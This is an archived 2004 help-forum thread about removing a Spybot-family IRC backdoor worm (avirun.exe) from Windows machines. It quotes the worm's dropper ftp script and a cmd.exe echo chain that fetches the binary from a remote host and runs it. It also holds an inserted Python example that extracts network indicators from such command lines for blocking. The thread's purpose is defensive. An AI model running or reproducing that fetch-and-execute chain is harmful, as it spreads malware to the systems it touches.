Solved

unknown virus / backdoor trojan for IRC

Posted on 2004-11-04
Last Modified: 2013-12-04
I have discovered a virus/backdoor trojan which I cannot find a resolution for. I have pieces of the virus, but not the entire puzzle to clean the infected machines. I have searched Google, Symantec, etc. for the process name (avirun.exe) but it was probably mutated. Here is what I have:

On Windows 2000 and XP boxes I found a process that runs called avirun.exe. When it runs it makes the computer unable to accept connections, mainly because the virus is opening the box to an IRC channel. I have to reboot in order to delete the avirun.exe, but first I have to delete all the "MSConfig" = "avirun.exe" entries out of the registry keys (and there are quite a few). However, this process comes back. I then found a file, named simply "o", which is displayed below. It looks as if this file FTPs the avirun.exe from another infected machine. Even if I delete all the entries, the avirun.exe and the o file, it still comes back, making me think that it spreads via a Windows exploit. I could not find any file (I checked recently modified files) that is a batch that would call the o file to download the .exe, or any other executables in the regedit Runs. It looks like the Backdoor.Hacarmy.E trojan, except that it keeps coming back.

Has anyone seen this? If so, is there a removal tool? I think if you fully patch the OS and delete all parts, it will stay away, but I need to be able to get rid of it on unpatched systems to stop the spread.

FYI, a full Symantec scan via the Internet or with the newest defs comes up clean.

o file:

open [ip address] [port]
user 1 1
get avirun.exe
quit
Question by:xxgenius

5 Comments
LVL 17

Expert Comment

by:Lobo042399
ID: 12500195
Hi xxgenius,

It sounds very interesting. The behaviour is that of a trojan. First thing I'd do is download ProcessExplorer and run it. Look for the avirun and the o processes. In ProcessExplorer, double-clicking on a process will bring up a wealth of info, including Registry keys and the IP number to which the process is connecting. If you have a firewall, you can create a rule to block access to that IP and then use KillBox to kill the offending files, especially the o file, which is the monitor/downloader. Then you can use the info gathered from ProcessExplorer to clean up your Registry.

You can download ProcessExplorer and KillBox from:

http://www.gatesofdelirium.com/ee/tools/

By the way, before deleting these files I'd make a Zip file with them and send it to the guys at McAfee and Symantec for research.

Good Vibes!

Lobo
LVL 8

Author Comment

by:xxgenius
ID: 12503735
These have been sent to Symantec and Sybari (which then disperses them to other engines). According to Symantec, their latest Rapid Response would catch it (haven't tried it yet). I can say that your Windows must be patched and then you can delete the files. Here is what the avirun.exe does when executed:

C:\WINDOWS\system32>avirun.exe
echo open [IPaddress Port] > o&echo user 1 1 >> o &echo get avirun.exe >> o &echo quit >> o &ftp -n -s:o &avirun.exe
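The "o" script in the question and the echo chain in the comment above are the same artifact seen from two sides: the worm writes a four-line ftp(1) script with redirected echo commands and feeds it to `ftp -n -s:o`. The following is an added example (editor's code, not the poster's) that reconstructs the script from such a command line, flags the echo-to-script-then-`ftp -s:` pattern, and pulls out the host, port, credentials and filename, which are the indicators you would block at the firewall and hand to the AV vendor. The address and port in the constructed samples are RFC 5737 documentation values, and all function names are the editor's own.

```python
"""Extract download indicators from an FTP-script dropper command line.

Added example, not code from the original thread.  Sample inputs below are
constructed; 192.0.2.10:6969 is a documentation address, not a real host.
"""
import re
from typing import Optional

# A dropped "o" script shaped like the one in the question (values constructed).
SAMPLE_O_FILE = "open 192.0.2.10 6969\nuser 1 1\nget avirun.exe\nquit\n"

# The one-line command avirun.exe runs, as captured above (values constructed).
SAMPLE_CMDLINE = (
    "echo open 192.0.2.10 6969 > o&echo user 1 1 >> o &echo get avirun.exe >> o "
    "&echo quit >> o &ftp -n -s:o &avirun.exe"
)


def parse_ftp_script(text: str) -> dict:
    """Parse an ftp(1)-style script (open/user/get/quit, one command per line)."""
    ioc = {"host": None, "port": 21, "user": None, "password": None, "files": []}
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts:
            continue
        verb, args = parts[0].lower(), parts[1:]
        if verb == "open" and args:
            ioc["host"] = args[0]
            if len(args) > 1 and args[1].isdigit():
                ioc["port"] = int(args[1])  # default 21 if no port given
        elif verb == "user" and args:
            ioc["user"] = args[0]
            ioc["password"] = args[1] if len(args) > 1 else None
        elif verb in ("get", "mget") and args:
            ioc["files"].extend(args)
    return ioc


def script_from_echo_chain(cmdline: str) -> Optional[str]:
    """Rebuild the file that a `echo x > f & echo y >> f` chain would write.

    Returns the reconstructed content, or None if no echo redirection is found.
    Only the first target file seen is followed; echoes to other files are skipped.
    """
    writes = []
    target = None
    for cmd in cmdline.split("&"):  # cmd.exe command separator
        m = re.match(r"\s*echo\s+(.*?)\s*(>>?)\s*(\S+)\s*$", cmd)
        if not m:
            continue
        content, op, fname = m.groups()
        if target is None:
            target = fname
        elif fname != target:
            continue
        if op == ">":
            writes = [content]      # truncating write starts the file over
        else:
            writes.append(content)  # appending write
    return "\n".join(writes) + "\n" if writes else None


def is_ftp_script_dropper(cmdline: str) -> bool:
    """True when a command line writes an ftp script via echo and runs ftp -s: on it."""
    script = script_from_echo_chain(cmdline)
    if script is None:
        return False
    uses_ftp_script = re.search(r"\bftp\b[^&]*-s:(\S+)", cmdline, re.IGNORECASE)
    return bool(uses_ftp_script) and "open" in script.lower()


def dropper_iocs(cmdline: str) -> Optional[dict]:
    """Indicators (host, port, credentials, files) for a dropper command line, else None."""
    if not is_ftp_script_dropper(cmdline):
        return None
    return parse_ftp_script(script_from_echo_chain(cmdline))


if __name__ == "__main__":
    print(parse_ftp_script(SAMPLE_O_FILE))
    print(dropper_iocs(SAMPLE_CMDLINE))
```

Run it over process command lines captured from the infected hosts (for example the command-line column in ProcessExplorer) or over the "o" file itself; either way you get the same host and port to block, and the `get` filename tells you which dropped binary to look for.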
LVL 8

Author Comment

by:xxgenius
ID: 12504856
Symantec definitions 11/5/04 Rev 5 will detect it as W32.Spybot.worm.

To rid your machine: fully patch Windows and reboot. Then run antivirus and delete the files it finds. Delete the "o" file. Open regedit, search all strings for the process and delete them.
LVL 1

Accepted Solution

by:GhostMod (earned 0 total points)
ID: 12508791
PAQd, 250 points refunded - asker posted solution

GhostMod
Community Support Moderator
LVL 17

Expert Comment

by:Lobo042399
ID: 12510147
kewlio